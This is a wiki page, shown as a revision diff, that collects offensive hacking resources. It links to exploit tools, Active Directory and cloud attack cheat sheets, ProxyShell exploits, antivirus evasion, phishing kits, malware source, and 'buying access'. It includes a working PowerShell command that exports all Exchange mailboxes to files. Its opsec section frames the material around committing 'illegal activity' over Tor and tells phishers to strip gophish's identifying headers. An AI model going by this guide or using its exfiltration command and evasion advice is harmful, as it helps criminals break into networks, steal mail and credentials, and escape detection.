Learn to hack: Difference between revisions
m (→OSINT) |
|||
Line 51: | Line 51: | ||
* https://github.com/qazbnm456/awesome-web-security | * https://github.com/qazbnm456/awesome-web-security | ||
* https://githubmemory.com/repo/Qing-Q/awesome-hacking-lists | * https://githubmemory.com/repo/Qing-Q/awesome-hacking-lists | ||
* https://github.com/A-poc/RedTeam-Tools | |||
== Active Directory == | == Active Directory == |
Revision as of 13:40, 31 December 2022
This page aims to compile high quality resources for hackers. All books listed on this page can be found on Library Genesis and Z-Library
General Resources
Resources that assume little to no background knowledge:
Resources that assume minimal tech background:
- (book) Penetration Testing: A Hands-On Introduction to Hacking
- Bassterlord Networking Manual (translated): https://papers.vx-underground.org/papers/VXUG/Mirrors/BassterlordNetworkingManual.pdf
Resources that assume a tech or hacking background:
- (book) The Hacker Playbook 3
- books by Sparc Flow
- Hack Back! A DIY Guide
- https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak
Practice labs:
- https://www.hackthebox.com/
- https://www.pentesteracademy.com/
- https://lab.pentestit.ru/
- https://overthewire.org/wargames/
General references:
- https://www.ired.team
- http://pwnwiki.io
- https://dmcxblue.gitbook.io/red-team-notes-2-0
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://github.com/S3cur3Th1sSh1t/Pentest-Tools
- https://github.com/offensive-security/exploitdb
- https://github.com/payloadbox
- Collection of malware source code: https://github.com/vxunderground/MalwareSourceCode
- https://github.com/jhaddix/tbhm
- https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- https://www.metasploit.com
- https://github.com/emilyanncr/Windows-Post-Exploitation
- https://github.com/infosecn1nja/Red-Teaming-Toolkit
- https://github.com/edoardottt/awesome-hacker-search-engines
- https://github.com/Hack-with-Github/Awesome-Hacking
- https://github.com/LOLBAS-Project/LOLBAS
- https://docs.anarchy-farm.com
- https://book.hacktricks.xyz
- https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
- https://github.com/0dayCTF/reverse-shell-generator
- https://0xsp.com/offensive/red-teaming-toolkit-collection/
- https://pwncat.org/
- https://gtfobins.github.io/
- https://codex-7.gitbook.io/
- https://github.com/qazbnm456/awesome-web-security
- https://githubmemory.com/repo/Qing-Q/awesome-hacking-lists
- https://github.com/A-poc/RedTeam-Tools
Active Directory
- An excellent practical reference
- A practical reference focused on powershell
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
- https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- https://wadcoms.github.io/
- https://www.blackhillsinfosec.com/webcast-attack-tactics-5-zero-to-hero-attack/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://en.hackndo.com/ntlm-relay/
- https://s3cur3th1ssh1t.github.io/The-most-common-on-premise-vulnerabilities-and-misconfigurations/
- A very thorough technical background: https://zer1t0.gitlab.io/posts/attacking_ad/
- kerberos background: https://www.tarlogic.com/blog/how-kerberos-works/
- A good overview of different lateral movement techniques: https://hackmag.com/security/lateral-guide/
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet
Tools
- https://mpgn.gitbook.io/crackmapexec/
- https://www.secureauth.com/labs/open-source-tools/impacket/
- https://github.com/dirkjanm/mitm6
- https://github.com/lgandx/Responder
- https://github.com/FuzzySecurity/StandIn
- https://www.joeware.net/freetools/tools/adfind/
- https://github.com/CravateRouge/bloodyAD
- https://github.com/blacklanternsecurity/MANSPIDER
- https://github.com/login-securite/DonPAPI
- Powerview/Sharpview
- Bloodhound/Sharphound
Office 365 & Azure
- Extremely in-depth technical info on everything https://o365blog.com/
- https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html
- https://blog.xpnsec.com/azuread-connect-for-redteam/
- AAD Connect Cloud Sync: as local admin impersonate or retrieve managed password of the provagentgMSA account to dcsync.
- https://www.blackhillsinfosec.com/webcast-getting-started-in-pentesting-the-cloud-azure/
- https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
- https://www.inversecos.com/
Tools
- https://github.com/nyxgeek/o365recon
- https://github.com/dirkjanm/ROADtools
- https://github.com/fox-it/adconnectdump
- https://github.com/LMGsec/o365creeper
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
- https://github.com/rvrsh3ll/TokenTactics
- https://github.com/nyxgeek/onedrive_user_enum
- https://github.com/dafthack/MSOLSpray
- https://github.com/dafthack/MFASweep
GSuite
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite
C2 Frameworks
Antivirus & EDR Evasion
- https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/
- https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/
- https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/
- https://www.blackhillsinfosec.com/tag/sacred-cash-cow-tipping/
- https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0
- https://www.ired.team/offensive-security/defense-evasion
- https://www.youtube.com/watch?v=UO3PjJIiBIE
- https://github.com/matterpreter/DefenderCheck
- https://github.com/RythmStick/AMSITrigger
- https://amsi.fail
VMware
- Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
- VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954: Unauthenticated server-side template injection. Mass Exploit
RocketChat
- Account hijacking and RCE as admin: https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy
Microsoft Exchange
ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.
- ProxyShell: https://github.com/dmaasland/proxyshell-poc
- Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell
- ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
- ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94
- Polymorphic webshells: https://github.com/grCod/poly
- ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF
- Export all mailboxes:
foreach ($mbx in (Get-Mailbox)){New-MailboxExportRequest -mailbox $mbx.alias -FilePath "\\127.0.0.1\C$\Folder\$($mbx.Alias).pst"}
- Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain
- Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto
Initial Access
Phishing
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
Password spraying
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying/
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/x90skysn3k/brutespray
Buying Access
CVE POCs
Scanning and Recon
- https://github.com/robertdavidgraham/masscan
- https://github.com/projectdiscovery/naabu
- https://github.com/OWASP/Amass
- https://www.shodan.io/
- https://www.zoomeye.org/
- https://search.censys.io/
- https://hunter.io/
- https://fullhunt.io/
- https://www.onyphe.io/
- https://binaryedge.io/
- https://ivre.rocks/
- https://vulners.com/
- https://pulsedive.com/
- https://www.exploit-db.com
- https://github.com/six2dez/reconftw
- https://github.com/lanmaster53/recon-ng
- https://github.com/jaeles-project/jaeles
- https://github.com/1N3/Sn1per
- https://github.com/projectdiscovery/nuclei
- https://github.com/wpscanteam/wpscan
- https://github.com/OWASP/joomscan
- https://github.com/immunIT/drupwn
- https://github.com/Tuhinshubhra/RED_HAWK
- https://github.com/root-tanishq/userefuzz
Web Crawlers
Wordlists
- https://wordlists.assetnote.io/
- https://github.com/danielmiessler/SecLists
- https://github.com/ameenmaali/wordlistgen
OSINT
Open-source intelligence Tools/Resources
- https://osintframework.com/
- https://www.tracelabs.org/initiatives/osint-vm
- https://github.com/jivoi/awesome-osint
- osintframework.de
- https://www.maltego.com/
- https://github.com/vysecurity/LinkedInt
- https://www.osintdojo.com/
- https://inteltechniques.com/
- https://github.com/uosint-project/uosint
- https://github.com/cipher387/osint_stuff_tool_collection
API Hacking
Intercepting Proxies
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications.
Opsec
Any illegal activity should be done from an encrypted and separate computer or virtual machine, with all traffic over Tor.
- https://www.qubes-os.org/
- https://www.whonix.org/
- https://tails.boum.org/
- The whonix wiki has lots of great info on anonymity even if you're not using whonix: https://www.whonix.org/wiki/Documentation
- https://gitlab.torproject.org/legacy/trac/-/wikis/doc/TransparentProxy
- https://veracrypt.fr/
- https://www.torproject.org/
- Disable javascript (set Security Level to "Safest" in Tor Browser)
Secure Messaging
Best practise is for your connections to go over Tor and for your messages to be end-to-end encrypted. For Jabber/XMPP make sure to enable OTR or OMEMO encryption. For email use PGP for encryption. For file sharing use onionshare.
- Tails comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email
- Probably the most mature jabber client with a focus on security and privacy is CoyIM
- https://cwtch.im/
- https://www.thunderbird.net/ A email client with built-in support for PGP encryption
- https://onionshare.org/
- See the whonix wiki for a more detailed comparison of secure messaging software